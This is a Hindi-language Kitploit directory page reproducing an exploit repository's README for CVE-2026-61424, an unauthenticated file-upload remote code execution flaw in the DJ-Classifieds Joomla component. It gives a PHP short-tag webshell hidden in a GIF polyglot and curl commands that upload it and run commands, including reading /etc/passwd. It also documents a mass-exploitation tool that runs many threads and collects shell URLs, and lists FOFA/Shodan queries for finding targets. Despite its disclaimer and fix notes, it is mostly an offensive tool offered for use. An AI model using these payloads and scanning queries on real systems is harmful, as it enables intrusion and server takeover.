Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-61424 — DJ-Classifieds Joomla कंपोनेंट में बिना प्रमाणीकरण के फ़ाइल अपलोड RCE। PHP शॉर्ट टैग्स के माध्यम से 3-स्ट्रिंग फ़िल्टर बाईपास। CVSS 10.0 | CWE-434 | com_djclassifieds < 3.11.2 | Kitploit
उपकरण/GitHubGitHub/shinthink/cve-2026-61424
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगगलत कॉन्फ़िगरेशनरेड टीमिंगरिमोट एक्सेस टूल
GitHubshinthink/cve-2026-61424

CVE-2026-61424

DJ-Classifieds Joomla कंपोनेंट में बिना प्रमाणीकरण के फ़ाइल अपलोड RCE। PHP शॉर्ट टैग्स के माध्यम से 3-स्ट्रिंग फ़िल्टर बाईपास। CVSS 10.0 | CWE-434 | com_djclassifieds < 3.11.2

रिपॉजिटरी देखें
21 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Python CVE CVSS License

CVE-2026-61424 — DJ-Classifieds <= 3.11.1

imageupload कार्य → बिना प्रमाणीकरण → 3-स्ट्रिंग फ़िल्टर बायपास (

अवलोकन

Joomla के लिए DJ-Classifieds में बिना प्रमाणीकरण वाला मनमाना फ़ाइल अपलोड (unauthenticated arbitrary file upload)। imageupload कार्य एंडपॉइंट फ़ाइल अपलोड को बिना प्रमाणीकरण के संसाधित करता है और एक 3-स्ट्रिंग ब्लॉकलिस्ट (<?php, eval(, base64) पर निर्भर करता है, जिसे PHP शॉर्ट ओपन टैग (<?=) का उपयोग करके आसानी से बायपास किया जा सकता है। GIF पॉलीग्लॉट के साथ, अपलोड की गई फ़ाइल सभी छवि सत्यापन जाँचों को पार कर जाती है, जबकि उसमें पूर्ण रूप से कार्यशील PHP वेबशेल होता है।


प्रभावित संस्करण

स्थितिसंस्करण
असुरक्षित1.0 — 3.11.1
पैच किया गया3.11.2 (20 जुलाई, 2026)

भेद्यता तंत्र

मूल कारण

administrator/components/com_djclassifieds/lib/djupload.php में upload() विधि को imageupload कार्य से मैप किया गया है, जिसमें कोई प्रमाणीकरण जाँच और कोई CSRF टोकन सत्यापन नहीं है।

root@kitploit:~
// administrator/components/com_djclassifieds/lib/djupload.php
// imageupload task → upload() method

// MISSING: JFactory::getUser() auth check
// MISSING: JSession::checkToken() CSRF check

$name     = $_REQUEST['name'] ?? $_REQUEST['filename'] ?? '';
$raw_body = file_get_contents('php://input');

// ... writes file to tmp/djupload/<name>

सुरक्षा फ़िल्टर क्यों विफल होता है (3-स्ट्रिंग बायपास)

कंटेंट स्कैनर केवल तीन शाब्दिक स्ट्रिंग्स को ब्लॉकलिस्ट करता है:

root@kitploit:~
// The ONLY malicious-content check in the entire upload handler:
if (preg_match('/<\?php|eval\(|base64/i', $fileContent)) {
    die('Malicious file detected');
}

यह <?php, eval( और base64 को ब्लॉक करता है — लेकिन PHP शॉर्ट ओपन टैग को नहीं:

root@kitploit:~
<?=system($_GET['c']);?>     ← 0/3 blocked strings → PASSES

PHP शॉर्ट इको टैग (<?=) PHP 5.4 से डिफ़ॉल्ट रूप से सक्षम हैं।

हमले का प्रवाह

  1. एक पॉलीग्लॉट तैयार करें: वैध GIF89a हेडर + <?=system($_GET['c']);?>
  2. name=shell.gif के साथ index.php?option=com_djclassifieds&task=imageupload पर POST करें
  3. सर्वर जाँच करता है: .gif एक्सटेंशन ✓ getimagesize() ✓ कोई <?php/eval(/base64 नहीं ✓
  4. फ़ाइल tmp/djupload/<shell>.gif में सहेजी जाती है
  5. एक्सेस: https://target.com/tmp/djupload/shell.gif?c=id

सत्यापित स्रोत फ़ाइलें

फ़ाइल

सर्वर लॉग साक्ष्य

प्रकटीकरण से पहले वाइल्ड में अनाम स्कैनर प्रोब देखे गए:

root@kitploit:~
POST /index.php?option=com_djclassifieds&task=imageupload
  name=<random>.gif  filename=<random>.gif
  — no cookie, no session, no referer

स्थापना

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-61424.git
cd CVE-2026-61424
pip install -r requirements.txt

उपयोग

एकल लक्ष्य

root@kitploit:~
python cve_2026_61424.py -t target.com

सामूहिक शोषण

root@kitploit:~
python cve_2026_61424.py -f targets.txt -o shells.txt

तर्क


प्रूफ़ ऑफ़ कॉन्सेप्ट (PoC)

एकल लक्ष्य

root@kitploit:~
$ python cve_2026_61424.py -t target.com

  Host         : target.com
  DJ-Classifieds: YES v3.11.1
  Upload       : YES
  RCE          : YES
  Shell        : https://target.com/tmp/djupload/img_abc123.gif
  Output       : DJ-SHELL-OK Linux ... uid=33(www-data) gid=33(www-data) ...
  Time         : 2.1s

मैन्युअल शोषण

root@kitploit:~
# Step 1 — Upload polyglot shell
curl -sk -X POST \
  "https://target.com/index.php?option=com_djclassifieds&task=imageupload&name=shell.gif&filename=shell.gif" \
  -H "Content-Type: image/gif" \
  --data-binary @polyglot.gif

# Step 2 — Verify RCE
curl -sk "https://target.com/tmp/djupload/shell.gif?c=id;hostname;uname+-a"

# Step 3 — Execute arbitrary commands
curl -sk "https://target.com/tmp/djupload/shell.gif?c=cat%20/etc/passwd"

FOFA / Shodan

root@kitploit:~
# DJ-Classifieds component
body="com_djclassifieds"

# Version disclosure (XML manifest)
body="DJ-Classifieds" && body="<version>"

# Exposed djupload directory
body="Index of" && body="djupload"

# Shodan
http.html:"com_djclassifieds" http.component:"Joomla"

फिक्स (3.11.2)

  1. Joomla प्रमाणीकरण जोड़ा गया — upload() से पहले JFactory::getUser() गेस्ट जाँच
  2. CSRF टोकन सत्यापन जोड़ा गया — imageupload कार्य पर JSession::checkToken()
  3. प्रतिबंधित फ़ाइल प्रकार — सर्वर-साइड केवल-छवि अनुमत सूची (allowlist) (jpg, jpeg, png, gif)
  4. बेहतर कंटेंट स्कैनिंग — 3-स्ट्रिंग ब्लॉकलिस्ट से परे अतिरिक्त PHP पैटर्न पहचान

प्रभाव

  • पूर्ण RCE — वेब सर्वर उपयोगकर्ता के रूप में मनमाने कमांड निष्पादित करें
  • स्थायी पहुँच — शेल तब तक बना रहता है जब तक इसे मैन्युअल रूप से नहीं हटाया जाता या निर्देशिका साफ़ नहीं की जाती
  • कंटेंट दुरुपयोग — विश्वसनीय डोमेन पर मनमानी फ़ाइलें अपलोड और होस्ट करें
  • डिस्क भरना (Disk exhaustion) — अनाम सामूहिक अपलोड क्षमता
  • श्रृंखलाबद्ध हमले — पॉलीग्लॉट छवि को साइट पर कहीं और LFI के माध्यम से शामिल किया जा सकता है

अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है। इसका उपयोग केवल उन प्रणालियों पर करें जिनके स्वामी आप हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है। लेखक दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।


संदर्भ


DJ-Extensions या mySites.guru से संबद्ध नहीं।

टूल डाउनलोड करें
फ़ील्डविवरण
CVECVE-2026-61424
उत्पादDJ-Classifieds (DJ-Extensions द्वारा Joomla एक्सटेंशन)
CVSS 4.010.0 (क्रिटिकल)
प्रकारCWE-434 — अप्रतिबंधित फ़ाइल अपलोड
खोजPhil Taylor / mySites.guru — 16 जुलाई, 2026
शोषणप्रकटीकरण से पहले वाइल्ड में पुष्टि की गई
भूमिका
administrator/components/com_djclassifieds/lib/djupload.phpupload() विधि — बिना प्रमाणीकरण, 3-स्ट्रिंग फ़िल्टर
components/com_djclassifieds/controller.phpimageupload कार्य को upload() पर रूट करता है
administrator/components/com_djclassifieds/djclassifieds.xml<version> टैग के माध्यम से संस्करण प्रकटीकरण
फ़्लैगविवरणडिफ़ॉल्ट
-t, --targetएकल लक्ष्य होस्ट—
-f, --fileलक्ष्यों वाली फ़ाइल (प्रति पंक्ति एक, # टिप्पणियाँ)—
-o, --outputRCE URL को फ़ाइल में सहेजें—
--threadsसामूहिक मोड के लिए वर्कर थ्रेड30
--no-cleanupRCE के बाद शेल न हटाएँFalse
--debugडिबग आउटपुटFalse
संसाधनलिंक
IONIX थ्रेट सेंटरionix.io/threat-center/cve-2026-61424
mySites.guru खोजmysites.guru/blog/dj-classifieds-unauthenticated-file-upload
DJ-Extensions सुरक्षा रिलीज़dj-extensions.com/blog/general/dj-classifieds-3-11-2-security-release
CVE.org रिकॉर्डcve.org/CVERecord?id=CVE-2026-61424
INCIBE-CERTincibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2026-61424